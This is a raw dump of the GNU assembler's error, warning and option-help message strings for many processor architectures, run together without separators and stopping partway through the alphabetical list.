preceding .file directive.callinfo is not within a procedure definition.cfi_endproc without corresponding .cfi_startproc.cpload not in noreorder section.def pseudo-op used inside of .def/.endef: ignored..def pseudo-op used inside of .def/.endef; ignored.dim pseudo-op used outside of .def/.endef: ignored..dim pseudo-op used outside of .def/.endef; ignored.ef with no preceding .function.end directive has no name.end directive missing or unknown symbol.end directive names different symbol than .ent.end directive names unknown symbol.end directive without a preceding .ent directive.end directive without a preceding .ent directive..end directive without a preceding .file directive.end directive without matching .ent.end not in text section.end symbol does not match .ent symbol..end%s without preceding .%s.endef pseudo-op used before .def; ignored.endef pseudo-op used outside of .def/.endef: ignored..endfunc missing for previous .func.endfunc missing for previous .proc.ent directive has no name.ent directive has no symbol.ent directive without matching .end.ent or .aent not in text section..err encountered.es without preceding .bs.fail %ld encountered.field count '%d' out of range (1 <= X <= 32).fill size clamped to %d.fmask outside of .ent.frame outside of .ent.ifeqs syntax error.incbin count zero, ignoring `%s'.linkonce is not supported for this object file format.literal_position inside literal directive; ignoring.ln pseudo-op inside .def/.endef: ignored..loc before .file.loc outside of .text.loc pseudo-op inside .def/.endef: ignored..mask outside of .ent.mask/.fmask outside of .ent.name directive has no symbol.name directive not in link (.link) section.option pic%d not supported.pdesc directive has no entry symbol.pdesc directive not in link (.link) section.pdesc has no matching .ent.popsection without corresponding .pushsection; ignored.previous without corresponding .section; ignored.prologue directive without a preceding .ent directive.sblock may be used for initialized sections only.scl pseudo-op used outside of .def/.endef ignored..scl pseudo-op used outside of .def/.endef; ignored.set pop with no .set push.size expression too complicated to fix up.size pseudo-op used outside of .def/.endef ignored..size pseudo-op used outside of .def/.endef; ignored.space or .fill with negative value, ignored.space repeat count is negative, ignored.space repeat count is zero, ignored.space specifies non-absolute value.space/.bes repeat count is negative, ignored.space/.bes repeat count is zero, ignored.stab%c is not supported.stab%c: description field '%x' too big, try a different debug format.stab%c: ignoring non-zero other field.stab%c: missing comma.syntax %s requires command-line option `--no-underscore'.syntax %s requires command-line option `--underscore'.tag pseudo-op used outside of .def/.endef ignored..tag pseudo-op used outside of .def/.endef; ignored.tag requires a structure tag.tag target '%s' undefined.tc not in .toc section.tc with no label.type pseudo-op used outside of .def/.endef ignored..type pseudo-op used outside of .def/.endef; ignored.usepv directive has no name.usepv directive has no type.uses does not refer to a local symbol in the same section.uses pseudo-op seen when not relaxing.uses target does not refer to a local symbol in the same section.val pseudo-op used outside of .def/.endef ignored..val pseudo-op used outside of .def/.endef; ignored.var may only be used within a macro definition.word %s-%s+%s didn't fit0x%lx: "%s" type = %ld, class = %d, segment = %d
16-bit jump out of range32-bit conditional branch generated32bit mode not supported on this CPU.5-bit field must be absolute5-bit immediate too large62-bit relocation not yet implemented64bit mode not supported on this CPU.68000 or higher68010 or higher68020 or higher68040 and 68851 specified; mmu instructions may assemble incorrectly: PC-relative operand can't be a constant: TLS operand can't be a constant: There are only 32 f registers; [0-31]: There are only 64 f registers; [0-63]: asr number must be between 0 and 31: asr number must be between 16 and 31: expecting %asrN: invalid ASI expression: invalid ASI name: invalid ASI number: invalid cpreg name: invalid membar mask expression: invalid membar mask name: invalid membar mask number: invalid prefetch function expression: invalid prefetch function name: invalid prefetch function number: invalid siam mode expression: invalid siam mode number: rd on write only ancillary state register: unrecognizable privileged register: unrecognizable v9a ancillary state register: unrecognizable v9a or v9b ancillary state register:b not permitted; defaulting to :w<abs><arch name>	  assemble for architecture <arch name><cpu name>	  assemble for CPU <cpu name><fpu name>	  assemble for FPU architecture <fpu name><imm8>,X<label><unknown>@local or @plt branch destination is too far away, %ld bytesA bignum/flonum may not be a displacement: 0x%lx usedA branch offset requires 0 MOD 4 alignmentA different %s was already specified, is now %sA status register or status bit name is requiredAAARG -> unhandled constant relocADRL used for a symbol not defined in the same fileARM register expectedAVR options:
  -mmcu=[avr-name] select microcontroller variant
                   [avr-name] can be:
                   avr1 - AT90S1200, ATtiny1x, ATtiny28
                   avr2 - AT90S2xxx, AT90S4xxx, AT90S8xxx, ATtiny22
                   avr3 - ATmega103, ATmega603
                   avr4 - ATmega83, ATmega85
                   avr5 - ATmega161, ATmega163, ATmega32, AT94K
                   or immediate microcontroller name.
Aborting because statement has "%s"Accessing `%s' as thread-local objectAccessing function `%s' as thread-local objectAddend to unresolved symbol not on word boundary.Address mode *+ARx is not allowed in memory-mapped register addressing.  Resulting behavior is undefined.Address mode *+ARx is write-only. Results of reading are undefined.Address of immediate operandAddressing mode not implemented yet.Adjusted signed .word (%ld) overflows: `switch'-statement too large.Alignment must be a power of 2Alignment negative: 0 assumedAlignment negative: 0 assumed.Alignment too large: %d assumedAlignment too large: %d. assumedAlignment too large: %d. assumed.Alpha options:
-32addr			treat addresses as 32-bit values
-F			lack floating point instructions support
-mev4 | -mev45 | -mev5 | -mev56 | -mpca56 | -mev6 | -mev67 | -mev68 | -mall
			specify variant of Alpha architecture
-m21064 | -m21066 | -m21164 | -m21164a | -m21164pc | -m21264 | -m21264a | -m21264b
			these variants include PALcode opcodes
An instruction was expanded (%s)Architecture mismatch on "%s".Argument to .even ignoredAssembler does not yet support PICAssembler messages:
Assertion failure at %s line %d.
Assertion failure in %s at %s line %d.
At least one PR argument expectedAt least two PR arguments expectedAttempt to put a common symbol into set %sAttempt to put an undefined symbol into set %sAuto increment/decrement offset '%ld' is out of range.BSPEC already active.  Nesting is not supported.BSPEC without ESPEC.BSS length (%d) < 0 ignoredBSS length (%d.) <0! Ignored.BYTE expression not a pure numberBYTE expression not in the range 0..255Bad .fmask directiveBad .frame directiveBad .frame directive 1./2. paramBad .frame directive 3./4. paramBad .mask directiveBad .mask/.fmask directiveBad .section directive: want a,e,w,x,M,S,G,T in stringBad .section directive: want a,o,s,w,x,M,S,G,T in stringBad .section directive: want a,s,w,x,M,S,G,T in stringBad COFF version '%s'Bad CPU version '%s'Bad base register, using $%d.Bad call to MD_ATOF()Bad call to MD_NTOF()Bad call to md_atof ()Bad call to md_atof () - floating point formats are not supportedBad call to md_atof()Bad element selector %ldBad floating point constant: %sBad opcode table, broken assembler.Bad opcode-table-option, check in file ns32k-opcode.hBad operandBad operand for a load instruction: <%s>Bad operand for a store instruction: <%s>Bad register name r%sBad register rangeBad relocation fixup type (%d)Bad segment (should be absolute).Bad segment in expression.Bad sequence number: !%s!%sBad suffix after ':' use {b|w|d} Defaulting to dBad suffix, defaulting to dBadly formed address expressionBig number is too bigBignum not permitted in short literal. Immediate mode assumed.Bignum too big for %c format; truncatedBignum too big for longBit field out of rangeBoth arguments must be substitution symbolsBoth the_insn.HI and the_insn.LO are set : %sBranch %s is always trueBranch out of rangeBranch to unaligned addressBroken assembler.  No assembly attempted.Buggy opcode: `%s' "%s"
C54x-specific command line  options:
CFI instruction used without previous .cfi_startprocCPU version has already been setCRIS-specific options:
Can not do %d byte %srelocationCan not do %d byte pc-relative pic relocationCan not do %d byte pc-relative relocationCan not do %d byte pc-relative relocation for storage type %dCan not do %d byte pic relocationCan not do %d byte relocationCan not do %d byte relocation for storage type %dCan not represent %s relocation in this object file formatCan not set dlx_skip_hi16_flagCan't change spaces within a procedure definition. IgnoredCan't change subspaces within a procedure definition. IgnoredCan't deal with expression; defaulting to %ldCan't do flonum short literal: immediate mode used.Can't find opcode to match operandsCan't handle O_big in s390_exp_compareCan't hash %s: %sCan't hash `%s': %s
Can't hash instruction '%s':%sCan't redirect stderr to the file '%s'Can't relax differenceCan't relocate expressionCan't set GP valueCan't set register masksCan't use floating point insn in this sectionCan't work out size of operand.
Cannot allocate unwind descriptor
Cannot assemble instructionCannot define export symbol: %s
Cannot define static symbol: %s
Cannot find relocation type for symbol %s, code %dCannot generate relocation type for symbol %s, code %sCannot handle fixupCannot make %s relocation PC relativeCannot represent relocation type %sCase value %ld unexpected at line %d of file "%s"
Changing of CPU version on the fly not supportedChose GP value of %lx
Comma and symbol expected for '.asg STRING, SYMBOL'Comma and symbol expected for '.eval EXPR, SYMBOL'Comma expectedCommon alignment negative; 0 assumedCommon alignment not a power of 2Complex expression not supportedCondition "%s" does not match preceding groupCondition "%s" uses a different accumulator from a preceding conditionCondition <%c%c> in structured control directive can not be encoded correctlyCoproccesor code > 25 bits (%lu)Could not set architecture and machineCurrent section is unitialized, section name required for .clinkD10V options:
-O                      Optimize.  Will do some operations in parallel.
--gstabs-packing        Pack adjacent short instructions together even
                        when --gstabs is specified.  On by default.
--no-gstabs-packing     If --gstabs is specified, do not pack adjacent
                        instructions together.
Default target `%s' is not supported.Defective assembler.  No assembly attempted.Deprecated syntax.Destination accumulator for each part of this parallel instruction must be differentDirective invalid within a bundleDisplacement length %s ignored!Divide by zero.Don't know how to figure width of %c in md_assemble()Duplicate %s conditionalDuplicate predicate register ignoredEBCDIC constants are not supportedECOFF debugging is disabled.ENDLOOP without corresponding LOOPESPEC without preceding BSPECError %s in %s
Error in relocation handlingError:Error: Even number required. Rounded to %dExecuting %s in IU in reverse serial may not workExecuting %s in IU may not workExecuting %s in IU may not work in parallel executionExecuting %s in reverse serial with %s may not workExpanded opcode after delayed branch: `%s'Expanded opcode in dual mode: `%s'Expected comma after common lengthExpected comma after nameExpected comma after name "%s"Expected comma after symbol-nameExpected comma after symbol-name: rest of line ignored.Expected quoted stringExpecting ']' found '%s'Expecting a register.Expecting character constant argumentExpecting register D for indexed indirect mode.Expecting second argumentExplicit stops are ignored in auto modeExpression Error for operand modifier %%hi/%%lo
Expression out of range, using 0Expression too complex.Extended addressing not supported on the specified CPUExtra )Extra junk in function call, expecting ')'FIRST not supported as a .SUBSPACE argumentFP branch in delay slotFP branch preceded by FP instruction; NOP insertedFPA register expectedFRAME parameter must be a multiple of 8: %d
FRV specific command line options:
Fatal error: Field not properly aligned [%d] (%d).Field out of range [%d..%d] (%d).File '%s' not in macro archive formatFirst opcode is long.  Unable to mix instructions as specified.Fixup of %ld too large for field width of %dFloat register should be even, was %dFloating point register in register listForced short literal to immediate mode. now_seg=%s to_seg=%sForcing byte displacementFound '{' after explicit switch to automatic modeFunction expects two argumentsGNU assembler %s
GOT already in symbol tableGP prologue size exceeds field size, using 0 insteadGREG expression too complicatedGarbage at end of instruction: `%s'.Gas failure, reloc value %d
Hashing returned "%s".High value system registers cannot be included in listI don't need or use temp. file "%s".I don't use an interpass file! -V ignoredI960 options:
INSTR_LABEL_DEF not supported yetIP2K specific command line options:
IU instruction may not be in the left containerIgnoring attempt to re-define symbolIgnoring attempt to re-define symbol `%s'.Ignoring changed section attributes for %sIgnoring statement due to "%s"Ilegal instruction or not implmented opcode.Illegal 19-bit code (%lu)Illegal operand.Illegal operandsIllegal operands for %sIllegal operands%sIllegal operands: %%%s can be only used with call __tls_get_addrIllegal operands: %%%s cannot be used together with other relocs in the insn ()Illegal operands: %%%s requires arguments in ()Illegal operands: %%r_%s%d requires arguments in ()Illegal operands: %%r_plt in %d-byte data fieldIllegal operands: %%r_tls_dtpoff in %d-byte data fieldIllegal operands: Can't add non-constant expression to %%%s()Illegal operands: Can't do arithmetics involving %%%s() of a relocatable symbolIllegal operands: Can't do arithmetics other than + and - involving %%%s()Illegal operands: Only %%r_%s%d allowed in %d-byte data fieldsIllegal operands: garbage after %%r_%s%d()Immediate operand is not allowed for operand %d.Immediate value not in 16 bit range: %ldImmediate value not in 4 bit unsigned range: %ldImmediate value not in 5 bit unsigned range: %ldImmediate value not in 6 bit range: %ldImmediate value not in 6 bit unsigned range: %ldImmediate value not in 8 bit range: %ldImproper extract size (%lu, position %lu)Improper insert size (%lu, position %lu)Improper position (%lu)Improper rotate countImproper shift amount (%lu)Increment/decrement value is out of range: `%ld'.Indexed indirect mode is not allowed for movb/movw.Indirect indexed addressing is not valid for 68HC11.Inserting "%s" into entry hint table failed: %sInserting "%s" into structure table failed: %sInstruction %s not allowed in a delay slot.Instruction %s requires absolute expressionInstruction %s: result is always falseInstruction %s: result is always trueInstruction '%s' requires an LP cpu versionInstruction '%s' requires far mode addressingInstruction `%s' is not recognized.Instruction does not fit in available delay slots (%d-word insn, %d slots left)Instruction does not fit in available delay slots (%d-word insn, %d slots left). Resulting behavior is undefined.Instruction formats for `%s':Instruction in R container is squashed by flow control instruction in L container.Instruction must be executed in parallelInstruction must be executed in parallel with another instruction.Instruction uses long version, so it cannot be mixed as specifiedInstructions do not use parallel execution pipelines.Instructions may not be executed in parallelInstructions share the same execution pipelineInstructions using long offset modifiers or absolute addresses are not repeatable. Resulting behavior is undefined.Instructions which cause PC discontinuity are not allowed in a delay slot. Resulting behavior is undefined.Internal Error:  Can't hash %s: %sInternal Error: Can't find %s in hash tableInternal Error: Can't hash %s: %sInternal assembler error for instruction %sInternal assembler error for instruction format %sInternal bug. Try to use 0(r%d) instead of @r%dInternal consistency error.  check ns32k-opcode.hInternal error!
Internal error, aborting at %s line %d
Internal error, aborting at %s line %d in %s
Internal error: Unable to find containing space for %s.Internal error: can't find opcode `%s' for `%s'
Internal error: can't hash `%s': %s
Internal error: losing opcode: `%s' "%s"
Internal logic error in iif.iifP[].typeInternal logic error in iif.iifP[n].typeInternal logic error.  line %d, file "%s"Internal logic error. line %d, file "%s"Invalid .CALL argument: %sInvalid .CALLINFO argument: %sInvalid .SPACE argumentInvalid .SUBSPACE argumentInvalid .insn format
Invalid Add Condition: %sInvalid Add and Branch ConditionInvalid Bit Branch Condition: %cInvalid COPR identifierInvalid Compare and Branch ConditionInvalid Compare/Subtract ConditionInvalid Compare/Subtract Condition: %sInvalid DataLabel expressionInvalid FP Compare Condition: %sInvalid FP Operand Format: %3sInvalid FTEST completer: %sInvalid Floating Point Operand Format.Invalid Indexed Load Completer Syntax.Invalid Indexed Load Completer.Invalid Logical Instruction Condition.Invalid MDMX Immediate (%ld)Invalid Nullification: (%c)Invalid PIC expression.Invalid SFU identifierInvalid Shift/Extract/Deposit Condition.Invalid Short Load/Store Completer.Invalid Store Bytes Short CompleterInvalid Unit Instruction Condition.Invalid accumulator register.Invalid argument %d to .prologue.Invalid argument description: %dInvalid argument location: %s
Invalid argument to .abi: %sInvalid argument to .mode: %sInvalid auxiliary register (use AR0-AR7)Invalid combination: --abi=32 with --abi=64Invalid combination: --abi=64 with --abi=32Invalid combination: --abi=64 with --isa=SHcompactInvalid combination: --isa=SHcompact with --abi=64Invalid combination: --isa=SHcompact with --isa=SHmediaInvalid combination: --isa=SHmedia with --isa=SHcompactInvalid default architecture, broken assembler.Invalid destination register for this instruction, use 'tfr'.Invalid destination register.Invalid dmad syntax '%s'Invalid expression after # number
Invalid expression after %%%%
Invalid field selector.  Assuming F%%.Invalid field size, must be from 1 to 32Invalid immediate write operand.Invalid indexed indirect mode.Invalid indexed register, expecting register X.Invalid indexed register, expecting register Y.Invalid indexed register.Invalid label '%s'Invalid left/right combination completerInvalid length (use 0 to %dInvalid mnemonic '%s'Invalid mode: %s
Invalid opcode/operandsInvalid operand (s) for parallel instruction "%s"Invalid operand (use 1, 2, or 3)Invalid operand expressionInvalid operand for `%s'Invalid operand:  immediate value used as address.Invalid operand:  immediate value used as base address.Invalid operands %sInvalid or illegal addressing mode combined with scaled-indexInvalid pc-relative relocationInvalid performance register (%lu)Invalid permutation completerInvalid register for dbcc/tbcc instruction.Invalid register for post/pre increment.Invalid register for single precision fmpyadd or fmpysubInvalid register list for ldm/stm
Invalid register number (%d)Invalid register specification.Invalid register.Invalid register: 'r%d'Invalid register: r0 and r15 illegalInvalid relocationInvalid scaled-indexed mode, use (b,w,d,q)Invalid source register for this instruction, use 'tfr'.Invalid source register.Invalid status register "%s"Invalid subscript (use 1 to %d)Invalid suffix for literal pool entryInvalid syntax in External addressing modeInvalid syntax in Memory Relative addressing modeInvalid syntax in PC-relative addressing modeInvalid value for `%s' (%lu)Known MCU names:Known MCU names:
LOC expression stepping backwards is not supportedLabel required for .tagLength of .comm "%s" is already %ld. Not changed to %d.Length of .comm "%s" is already %ld. Not changed to %ld.Length of .lcomm "%s" is already %ld. Not changed to %ld.Length of .scomm "%s" is already %ld. Not changed to %ld.Length specification ignored. Address mode 9F usedLine %d: unknown relocation type: 0x%x.Line numbers must be positive integers
Long instructions may not be combined.Looks like a proc, but can't tell what kind.
Low order bits truncated in immediate float operandM340 specific opcode used when assembling for M210MCORE specific options:
  -{no-}jsri2bsr	  {dis}able jsri to bsr transformation (def: dis)
  -{no-}sifilter	  {dis}able silicon filter behavior (def: dis)
  -cpu=[210|340]          select CPU type
  -EB                     assemble for a big endian system (default)
  -EL                     assemble for a little endian system
MIPS PIC call to register other than $25MN10200 options:
none yet
MOVI operand is not a 32-bit signed value: 0x%8x%08xMRI style ORG pseudo-op not supportedMSP430 does not have %d registersMU instruction may not be in the right containerMacro %s not implemented yetMacro instruction expanded into multiple instructionsMacro instruction expanded into multiple instructions in a branch delay slotMacro used $at after ".set noat"Maverick DSPSC register expectedMaverick MVAX register expectedMaverick MVD register expectedMaverick MVF register expectedMaverick MVFX register expectedMemory mapped register "%s" out of rangeMisplaced .entry. Ignored.Missing '(' after substitution symbol functionMissing ')' in subscripted substitution symbol expressionMissing )Missing ) in ra(rb)Missing .EXIT for a .ENTRYMissing .callinfoMissing .callinfo for this procedureMissing .callinfo.Missing .exit
Missing .procend
Missing `]' to close indexed-indirect mode.Missing `]' to close register indirect operand.Missing arguments for opcode <%s>.Missing forced substitution terminator ':'Missing function name for .PROCMissing function name for .PROC (corrupted label chain)Missing label name on .LABELMissing operandMissing operand.Missing predicate relation typeMissing second register for indexed-indirect mode.Missing second register or offset for indexed-indirect mode.Missing size argumentMixing of normal and extended addressing not supportedMore than one relocation op per insnMust be in a space before changing or declaring subspaces.
NS32K options:
-m32032 | -m32532	select variant of NS32K architecture
--disp-size-default=<1|2|4>
Name   # Modes  Min ops  Max ops  Modes mask  # Used
Need #1 or #2 hereNeither Power nor PowerPC opcodes were selected.Nested proceduresNo !literal!%ld was foundNo !tlsgd!%ld was foundNo !tlsldm!%ld was foundNo 'bal' entry point for leafproc %sNo .ENTRY for this .EXITNo .cprestore pseudo-op used in PIC codeNo .frame pseudo-op used in PIC codeNo comma after .pdesc <entryname>No compiled in support for %d bit object file formatNo compiled in support for 64 bit object file formatNo compiled in support for x86_64No instruction or missing opcode.No lda !gpdisp!%ld was foundNo ldah !gpdisp!%ld was foundNo memory for symbol name.No operatorNo previous section to return to. Directive ignored.No relocation operandNo segment info for current sectionNo such entry in list. (cpu/mmu register)No such opcodeNo symbol after .code_addressNo symbol after .linkageNon-absolute symbol: '%s'.Not enough operandsNot in a space.
Not in a subspace.
Number larger than 64 bitsOPF immediate operand out of range (0-0x1ff)Odd numbered register used as target of multi-register instructionOffset on nested structures is ignoredOffset out of 16-bit range: %ld.Offset out of 5-bit range for movw/movb insn: %ld.One of these instructions may not be executed in parallel.Only one .copyright pseudo-op per file!Only one .version pseudo-op per file!Only one comparison conditional allowedOnly one overflow conditional allowedOnly the first path encountering the conflict is reportedOpcode `%s' is not recognized.Opcode `%s' with these operand types not available in %s modeOpcode `%s' with these operand types not available in H8/300 modeOpcode `%s' with these operand types not available in H8/300H modeOpcode `%s' with these operand types not available in H8/300S modeOpcode(%d.%s): Operand "%s" out of range (use 1 or 2)Operand '%s' out of range (%d <= x <= %d)Operand `%x' not recognized in fixup16.Operand `%x' not recognized in fixup8.Operand out of 16-bit range: `%ld'.Operand out of 8-bit range: `%ld'.Operand out of range for a relative branch: `%ld'Option `%s' is not recognized.Options:
  -a[sub-option...]	  turn on listings
                      	  Sub-options [default hls]:
                      	  c      omit false conditionals
                      	  d      omit debugging directives
                      	  h      include high-level source
                      	  l      include assembly
                      	  m      include macro expansions
                      	  n      omit forms processing
                      	  s      include symbols
                      	  =FILE  list to FILE (must be last sub-option)
Out of memory: could not allocate new space chain entry: %s
Out of memory: could not allocate new subspace chain entry: %s
PC part of operand unpredictablePC-relative relocation must be trivially resolvedPIC code offset overflow (max 16 signed bits)PIC code offset overflow (max 32 signed bits)PIC relocation size does not match operand sizePJ options:
-little			generate little endian code
-big			generate big endian code
PSW cannot be included in listPTA operand is a SHcompact symbolPTB operand is a SHmedia symbolParameters of an existing subspace can't be modifiedPipelined instruction: fsrc1 = fdestPlease report this bug.
Please use --help to see usage and options for this assembler.
Post-decrement mode is not valid for 68HC11.Post-increment mode is not valid for 68HC11.Pre-increment mode is not valid for 68HC11Predicate register expectedPredicate source and target requiredPremature end of suffix -- Defaulting to dPseudodirective .file is only valid when generating ELFPseudodirective .loc is only valid when generating ELFRedefining entrynum for sysproc %sRedefining leafproc %sReg not valid for H8/300Register name %s conflicts with symbol of the same nameRegister name expectedRegister number must be EVENRegister symbol %s already defined.Register value annotation ignoredRelaxation should never occurRelocatable values require at least WORD storageRelocation %d is not supported by object file format.Relocation %s is not safe for %sRelocation cannot be done when using -mrelocatableReport bugs to %s
SHmedia code not allowed in same section as constants and SHcompact codeSPARC options:
SYMBOL TABLE not implementedS^# may only read-accessS^# needs expressionScaled-indexed addressing mode combined with scaled-indexSemantics error.  This type of operand can not be relocated, it must be an assembly-time constantShort literal overflow(%ld.), immediate mode assumed.Spurious `,' or bad indirect register addressing mode.Substitution symbols must begin with a letterSubtype %d is not recognized.Support for 64-bit arithmetic not compiled in.Swapping instruction orderSymbol '%s' could not be created.Symbol `%s' can not be both weak and commonSymbol missing for .set/.equSymbol used as immediate operand in PIC mode.Syntax in scaled-indexed mode, use [Rn:m] where n=[0..7] m={b,w,d,q}TOKEN TRACE not implementedTarget processor does not support this instruction.The .ENTER pseudo-op is not supportedThe .LEAVE pseudo-op is not supportedThe XCOFF file format does not support arbitrary sectionsThe `.abi %s' directive is not valid with this architectureThe `.mode %s' directive is not valid with this architectureThe trap id must be a constant.This assembler was configured for a target of `%s'.
This immediate requires 0 MOD 16 alignmentThis immediate requires 0 MOD 2 alignmentThis immediate requires 0 MOD 4 alignmentThis immediate requires 0 MOD 8 alignmentThis is the location of the conflicting usageThis operand must be constant at assembly timeToo many operandsToo many operands passed to instructionToo many operands: %sTrap id `%ld' is out of range.Trap id must be within [0x30..0x39] or [0x40..0xff].Tried to .set unrecognized mode `%s'Tried to set unrecognized symbol: %s
Trying to 'bal' to %sTwo IU instructions may not be executed in parallelTwo MU instructions may not be executed in parallelUnable to allocate memory for new instructions
Unable to determine default target processor from string: %sUnable to mix instructions as specifiedUnable to produce reloc against symbol '%s'Unary operator %c ignored because bad operand followsUndefined .EXPORT/.IMPORT argument (ignored): %sUndefined absolute constant: '%s'.Undefined register: '%s'.Undefined space: '%s' Assuming space number = 0.Undefined substitution symbol '%s'Unexpected branch conversion with `%x'Unexpected return value [%d] from parse_toc_entry!
Unhandled dependency %s for %s (%s), note %dUnimplemented register `%s' specifiedUnimplemented toc32 expression modifierUnimplemented toc64 expression modifierUnknown .syntax operandUnknown CPU identifier `%s'Unknown architectureUnknown default cpu = %s, os = %sUnknown instruction '%s'Unknown opcode `%s'.Unknown opcode: `%s'Unknown operatorUnknown relocation encountered in md_apply_fix.Unknown relocation operand: !%sUnknown section directiveUnknown segment typeUnknown temporary pseudo registerUnmatched high/shigh relocUnrecognised option: -hiddenUnrecognized .LEVEL argument
Unrecognized .type argumentUnrecognized condition code "%s"Unrecognized dependency specifier %d
Unrecognized field type '%c'Unrecognized fix-up (0x%08lx)Unrecognized indirect address format "%s"Unrecognized instruction "%s"Unrecognized opcode format: `%s'Unrecognized opcode: `%s'Unrecognized operand list '%s' for instruction '%s'Unrecognized option "%s"Unrecognized option '-x%s'Unrecognized option following -KUnrecognized parallel instruction "%s"Unrecognized parallel instruction '%s'Unrecognized parallel instruction combination "%s || %s"Unrecognized predicate relation typeUnrecognized section '%s'Unrecognized status bit "%s"Unrecognized struct/union tag '%s'Unrecognized substitution symbol functionUnrecognized symbol suffixUnrecognized token '%s'Unrecognized version '%s'Unsupported large constantUnsupported relocation size %dUnsupported section attribute -- 'a'Unsupported use of .gpdwordUnsupported use of .gpwordUnsupported use of spUnterminated string after absolute expressionUnwind directive not followed by an instruction.Usage: %s [option...] [asmfile...]
Use of .def/.ref is deprecated.  Use .global insteadUse of p0 is not valid in this contextUse the .mmregs directive to use memory-mapped register names such as '%s'Used $at without ".set noat"Using ENTRY rather than CODE in export directive for %sVAX options:
-d LENGTH		ignored
-J			ignored
-S			ignored
-t FILE			ignored
-T			ignored
-V			ignored
VFP single precision register expectedVFP system register expectedVIP_BEGIN error:%sVLIW packing constraint violationVLIW packing used for -mno-packVMS options:
-+			hash encode (don't truncate) names longer than 64 characters
-H			show new symbol after hash truncation
VMS options:
-+			hash encode names longer than 31 characters
-1			`const' handling compatible with gcc 1.x
-H			show new symbol after hash truncation
-h NUM			don't hash mixed-case names, and adjust case:
			0 = upper, 2 = lower, 3 = preserve case
-v"VERSION"		code being assembled was produced by compiler "VERSION"
Value %ld too large for 8-bit PC-relative branch.Value for ENTRY_FR must be in the range 12..21
Value for ENTRY_GR must be in the range 3..18
Value for ENTRY_SR must be 3
Value not in 16 bit range: %ldValue not in 4 bit unsigned range: %ldValue not in 5 bit unsigned range: %ldValue not in 6 bit range: %ldValue not in 6 bit unsigned range: %ldValue not in 8 bit range: %ldValue out of 16-bit range.Value truncated to 62 bitsVery short instr to option, ie you can't do it on a NULLstrVirtual memory exhaustedWarning:Warning: Warning: duplicated register (r%d) in register listWarning: register range not in ascending orderWrong displacement  %dWrong number of operandsWrong numbers of operands in default, check ns32k-opcodes.hWrong register in floating-point reglistWrong register in register indirect mode.Wrong size pointer register for architecture.[0-9]H labels do not mix with dot-pseudos[0-9]H labels may not appear alone on a line[PC] index banned[]index same as ()+register: unpredictable[]index same as -()register: unpredictable[tocv] symbol is not a toc symbol`%s' is already the alias of %s `%s'`%s' is not a valid %s bit base/index expression`%s' is not a valid base/index expression`%s' is not a valid segment register`%s' operand %d must use `%%es' segment`%s' symbol without preceding function`&' serial number operator is not supported`)' required`,' required`.abi 32' but command-line options do not specify 32-bit ABI`.abi 64' but command-line options do not specify 64-bit ABI`af' must appear alone`noreorder' must be set before `nomacro'a bignum with underscores may not have more than 8 hex digits in any worda bignum with underscores must have exactly 4 wordsa register has no addressabsolute expression requiredabsolute sections are not supportedacc0 expectedaddress prohibits #address prohibits ()address prohibits ()+address prohibits -()address prohibits @address prohibits []address prohibits displacement length specifieraddress prohibits registeraddress too high for vector table jmp/jsraddressing mode not supportedalias = %s
alignment negative. 0 assumed.alignment negative; 0 assumedalignment not a power of 2alignment padding (%lu bytes) not a multiple of %ldalignment too large: %d assumedalignment too large: %u assumedalignment too large; %d assumedalignment too large; assuming %dalignments greater than 32 bytes not supported in .text sections.architecture bumped from "%s" to "%s" on "%s"architecture of opcode conflicts with that of earlier instruction(s)assemble Thumb codeassemble for big-endianassemble for little-endianassuming all members of group `%s' are COMDATattempt to .org/.space backwards? (%ld)attempt to .space/.bes backwards? (%ld)attempt to allocate data in absolute sectionattempt to allocate data in common sectionattempt to branch into different segmentattempt to get value of unresolved symbol `%s'attempt to move .org backwardsattempt to redefine pseudo-op `%s' ignoredattempt to redefine symbolattempt to store value in absolute sectionbackward ref to unknown label "%d:"bad .common segment %sbad .fmask directivebad .frame directivebad .mask directivebad .relax formatbad .reserve segment -- expected BSS segmentbad .uses formatbad .weakext directivebad COFF debugging informationbad argument to syntax directive.bad arguments to instructionbad base register: must be r0bad byte vector index (%ld)bad call to MD_ATOF()bad call to md_atofbad char = '%c'
bad coprocessor idbad defsym; format is --defsym name=valuebad escaped character in stringbad expressionbad floating literal: %sbad floating-point constant: exponent overflowbad floating-point constant: unknown error code=%dbad format for ifc or ifncbad format of OPT NEST=depthbad immediate value for offset (%ld)bad instruction `%s'bad memory operand `%s'bad opcode or operandsbad or irreducible absolute expressionbad or irreducible absolute expression; zero assumedbad or missing co-processor numberbad or unhandled relocation type: 0x%02xbad range in register listbad register expressionbad register in []bad register listbad register list: %sbad register name `%s'bad register name: %sbad register number: %sbad relaxation statebad relocation fixup type (%d)bad relocation type: 0x%02xbad segmentbad starting register: r0 and r15 invalidbad symbol suffixbad/missing psr specifierbadly formed .dim directivebadly formed .dim directive ignoredbadly formed .size directivebase register expectedbfd-target = %s
bfd_set_section_flags: %sbig endian mode is not supportedbignum invalidbignum invalid; zero assumedbignum truncated to %d bytesboth insns for !gpdisp!%ld must be in the same sectionbra or bsr with undefined symbol.branch operand has odd offset (%lx)
branch out of rangebranch prediction invalid on this opcodebreak outside of structured loopbyte displacement out of rangebyte or halfword not valid for base registercall to md_convert_frag
call to md_convert_frag 
call to md_estimate_size_before_relax
call to tc_aout_fix_to_chars 
call tomd_estimate_size_before_relax 
call/jmp target out of range (1)call/jmp target out of range (2)can not do %d byte pc-relative relocationcan not do %d byte relocationcan not resolve expressioncan't []index a register, because it has no addresscan't close `%s'can't create group: %scan't create section %scan't extend frag %u charscan't find fixup pointed to by .usescan't find opcodecan't find opcode can't handle expressioncan't handle generation of literal/labels yetcan't handle non absolute segment in `%s'can't handle undefined OP TYPEcan't have relocation for ipushcan't mix positional and keyword argumentscan't open `%s' for writingcan't open a bfd on stdout %scan't parse register listcan't predecrementcan't resolve `%s' {%s section} - `%s' {%s section}can't resolve value for symbol `%s'can't set section flags for section %scan't start writing .mdebug section: %scan't use COBR format with external labelcan't use R0 herecan't use high part of register in operand %dcannot both predecrement and postincrementcannot branch to odd addresscannot define symbol `%s' in absolute sectioncannot emit PC relative %s relocationcannot emit PC relative %s relocation against %scannot generate relocation type for symbol %s, code %scannot represent %s relocation in this object file formatcannot represent `%s' relocation in object filecannot represent relocation type %scannot set literal_prefix inside literal fragmentcannot write to output filecanonical = %s
